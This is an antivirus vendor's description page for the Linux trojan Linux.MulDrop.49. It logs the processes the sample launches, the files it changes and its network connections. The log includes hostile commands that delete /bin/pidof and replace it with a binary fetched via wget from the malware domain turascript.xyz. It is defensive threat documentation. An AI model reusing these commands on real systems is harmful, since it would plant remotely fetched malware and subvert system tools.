Bibliothèque
Ma bibliothèque

+ Ajouter à la bibliothèque

Contacter-nous !
Support 24/24 | Rules regarding submitting

Nous téléphoner

0 825 300 230

Forum

Vos requêtes

  • Toutes : -
  • Non clôturées : -
  • Dernière : le -

Nous téléphoner

0 825 300 230

Profil

Linux.MulDrop.49

Added to the Dr.Web virus database: 2020-02-20

Virus description added:

Technical Information

Malicious functions:
Launches processes:
  • /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
  • <SAMPLE_FULL_PATH>
  • /bin/bash <SAMPLE_FULL_PATH> -c
  • mv /bin/pidof /bin/prednizons
  • rm -rf /bin/pidof
  • wget -q --no-check-certificate https://turascript.xyz/pidof
  • chmod 777 pidof
  • wget https://turascript.xyz/panel/turasc/scscript/info.txt -q -O -
  • wget https://turascript.xyz/panel/turasc/scscript/info2.txt -q -O -
  • id -u
  • clear
  • sleep 3
  • grep CentOS
  • grep ^NAME
  • cat /etc/os-release
  • grep Ubuntu
  • grep Debian
  • apt-get update -y
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • update-ca-certificates
  • mktemp -t ca-certificates.crt.tmp.XXXXXX
  • mktemp -t ca-certificates.tmp.XXXXXX
  • sed -n -e /^$/d -e s/^!//p /etc/ca-certificates.conf
  • sed -e /^$/d -e /^#/d -e /^!/d /etc/ca-certificates.conf
  • basename /usr/share/ca-certificates/mozilla/ACCVRAIZ1.crt .crt
  • sed -e s/ /_/g -e s/[()]/=/g -e s
  • readlink /etc/ssl/certs/ACCVRAIZ1.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/ACCVRAIZ1.crt
  • basename /usr/share/ca-certificates/mozilla/ACEDICOM_Root.crt .crt
  • readlink /etc/ssl/certs/ACEDICOM_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/ACEDICOM_Root.crt
  • basename /usr/share/ca-certificates/mozilla/Actalis_Authentication_Root_CA.crt .crt
  • readlink /etc/ssl/certs/Actalis_Authentication_Root_CA.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Actalis_Authentication_Root_CA.crt
  • basename /usr/share/ca-certificates/mozilla/AddTrust_External_Root.crt .crt
  • readlink /etc/ssl/certs/AddTrust_External_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AddTrust_External_Root.crt
  • basename /usr/share/ca-certificates/mozilla/AddTrust_Low-Value_Services_Root.crt .crt
  • readlink /etc/ssl/certs/AddTrust_Low-Value_Services_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AddTrust_Low-Value_Services_Root.crt
  • basename /usr/share/ca-certificates/mozilla/AddTrust_Public_Services_Root.crt .crt
  • readlink /etc/ssl/certs/AddTrust_Public_Services_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AddTrust_Public_Services_Root.crt
  • basename /usr/share/ca-certificates/mozilla/AddTrust_Qualified_Certificates_Root.crt .crt
  • readlink /etc/ssl/certs/AddTrust_Qualified_Certificates_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AddTrust_Qualified_Certificates_Root.crt
  • basename /usr/share/ca-certificates/mozilla/AffirmTrust_Commercial.crt .crt
  • readlink /etc/ssl/certs/AffirmTrust_Commercial.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AffirmTrust_Commercial.crt
  • basename /usr/share/ca-certificates/mozilla/AffirmTrust_Networking.crt .crt
  • readlink /etc/ssl/certs/AffirmTrust_Networking.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AffirmTrust_Networking.crt
  • basename /usr/share/ca-certificates/mozilla/AffirmTrust_Premium.crt .crt
  • readlink /etc/ssl/certs/AffirmTrust_Premium.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AffirmTrust_Premium.crt
  • basename /usr/share/ca-certificates/mozilla/AffirmTrust_Premium_ECC.crt .crt
  • readlink /etc/ssl/certs/AffirmTrust_Premium_ECC.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AffirmTrust_Premium_ECC.crt
  • basename /usr/share/ca-certificates/mozilla/ApplicationCA_-_Japanese_Government.crt .crt
  • readlink /etc/ssl/certs/ApplicationCA_-_Japanese_Government.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/ApplicationCA_-_Japanese_Government.crt
  • basename /usr/share/ca-certificates/mozilla/Atos_TrustedRoot_2011.crt .crt
  • readlink /etc/ssl/certs/Atos_TrustedRoot_2011.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Atos_TrustedRoot_2011.crt
  • basename /usr/share/ca-certificates/mozilla/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.crt .crt
  • readlink /etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.crt
  • basename /usr/share/ca-certificates/mozilla/Baltimore_CyberTrust_Root.crt .crt
  • readlink /etc/ssl/certs/Baltimore_CyberTrust_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Baltimore_CyberTrust_Root.crt
  • basename /usr/share/ca-certificates/mozilla/Buypass_Class_2_CA_1.crt .crt
  • readlink /etc/ssl/certs/Buypass_Class_2_CA_1.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Buypass_Class_2_CA_1.crt
  • basename /usr/share/ca-certificates/mozilla/Buypass_Class_2_Root_CA.crt .crt
  • readlink /etc/ssl/certs/Buypass_Class_2_Root_CA.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Buypass_Class_2_Root_CA.crt
  • basename /usr/share/ca-certificates/mozilla/Buypass_Class_3_Root_CA.crt .crt
  • readlink /etc/ssl/certs/Buypass_Class_3_Root_CA.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Buypass_Class_3_Root_CA.crt
  • basename /usr/share/ca-certificates/mozilla/CA_Disig.crt .crt
  • readlink /etc/ssl/certs/CA_Disig.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/CA_Disig.crt
  • basename /usr/share/ca-certificates/mozilla/CA_Disig_Root_R1.crt .crt
  • readlink /etc/ssl/certs/CA_Disig_Root_R1.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/CA_Disig_Root_R1.crt
  • basename /usr/share/ca-certificates/mozilla/CA_Disig_Root_R2.crt .crt
  • readlink /etc/ssl/certs/CA_Disig_Root_R2.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/CA_Disig_Root_R2.crt
  • basename /usr/share/ca-certificates/mozilla/Camerfirma_Chambers_of_Commerce_Root.crt .crt
  • readlink /etc/ssl/certs/Camerfirma_Chambers_of_Commerce_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Camerfirma_Chambers_of_Commerce_Root.crt
Kills the following processes:
  • /usr/lib/apt/methods/http
Performs operations with the file system:
Creates or modifies files:
  • /bin/pidof
  • /var/lib/apt/lists/lock
  • /var/lib/apt/lists/security.debian.org_dists_jessie_updates_InRelease
  • /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
  • /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg.reverify
  • /var/lib/dpkg/lock
  • /tmp/ca-certificates.crt.tmp.cuPhx9
  • /tmp/ca-certificates.tmp.SkBRZZ
  • /tmp/ca-certificates.tmp.PMOkJ7
Deletes files:
  • /bin/pidof
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
  • /var/cache/apt/pkgcache.bin
  • /var/cache/apt/srcpkgcache.bin
Network activity:
Establishes connection:
  • <LOCAL_DNS_SERVER>
  • 18#.##9.26.181:443
  • 21#.##6.149.233:80
  • [2#######8:dc41:100::233]:80
  • [2#########:1:216:35ff:fe7f:6ceb]:80
HTTP GET requests:
  • se######.#####n.org/dists/jessie/updates/InRelease
  • ft#.##.######.org/debian/dists/jessie/InRelease
  • ft#.##.######.#rg/debian/dists/jessie-updates/InRelease
DNS ASK:
  • tu###cript.xyz
  • ft#.##.debian.org
  • se####ty.debian.org
Sends data to the following servers:
  • 18#.##9.26.181:443
Receives data from the following servers:
  • 18#.##9.26.181:443
Other:
Collects RAM information

Recommandations pour le traitement


Linux

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

Version démo gratuite

Pour 1 mois (sans enregistrement) ou 3 mois (avec enregistrement et remise pour le renouvellement)

Télécharger Dr.Web

Par le numéro de série